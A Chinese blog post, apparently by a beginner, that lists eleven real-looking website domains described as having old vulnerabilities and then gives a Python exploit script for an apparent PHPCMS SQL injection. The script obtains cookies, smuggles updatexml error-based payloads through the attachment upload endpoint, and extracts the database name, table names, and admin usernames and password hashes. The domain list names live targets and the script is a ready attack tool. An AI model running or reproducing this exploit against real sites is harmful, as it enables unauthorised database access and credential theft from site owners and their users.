漏洞网站
都是老漏洞了,我这个新手学习一下
http://www.d6xiazai.com/
http://www.zgdjzz.cn/
http://www.csuav.com/
http://www.cespc.com/
http://www.dghxjs.cn/
http://www.dqcdzz.cn/
http://www.zdblx.cn/
http://www.zgrczz.cn/
http://www.zgsykx.cn/
http://www.wjhzs.com/
http://www.szxax.com/
exp学习编写
学习漏洞原理,对poc学习自己编写exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
import re
from urllib import quote
TIMEOUT = 5
REQ = "hex"
def payload(num,req):
payload1 = "&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20database()),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
payload2 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema=%*27"+req+"%*27%*20limit%*200,1),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
payload3 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20username%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
payload4 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
payload5 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),17,40)),0x7e),1)#&m=1&modelid=1&f=1&catid=1"
if num ==1:
return payload1
elif num ==2:
return payload2
elif num ==3:
return payload3
elif num ==4:
return payload4
elif num ==5:
return payload5
else:
return False
def exp(url):
num =0
while num < 5 :
num += 1
if num == 2:
req = req[1]
req = ''.join(req)
pay = payload(num,req)
elif num == 3:
global REQ
req = req[1]
REQ = ''.join(req)
pay = payload(num,REQ)
else:
req = 'hex'
pay = payload(num,req)
cookies = {}
ck = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
for c in requests.get(ck, timeout=TIMEOUT).cookies:
if c.name[-7:] == '_siteid':
cookie_head = c.name[:6]
cookies[cookie_head + '_userid'] = c.value
cookies[c.name] = c.value
break
else:
return False
js = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(pay))
for c in requests.get(js, cookies=cookies, timeout=TIMEOUT).cookies:
if c.name[-9:] == '_att_json':
enc_payload = c.value
break
else:
return False
req = url + '/index.php?m=content&c=down&a_k=' + enc_payload
req = requests.get(req, cookies=cookies, timeout=TIMEOUT)
#re = req.content
req = re.findall("XPATH syntax error: '~(.*?)~' <br />",req.content)
if req == []:
print "column错误"
elif num == 1:
print "database:"+req[1]
elif num == 2:
print "tablename:"+req[1]
elif num == 3:
print "username:"+req[1]
elif num == 4:
pw = req[1]
elif num == 5:
print "password:"+pw+req[1]
else:
print req[1]
exp(sys.argv[1])
执行效果
本文作者为江小悠,转载请注明。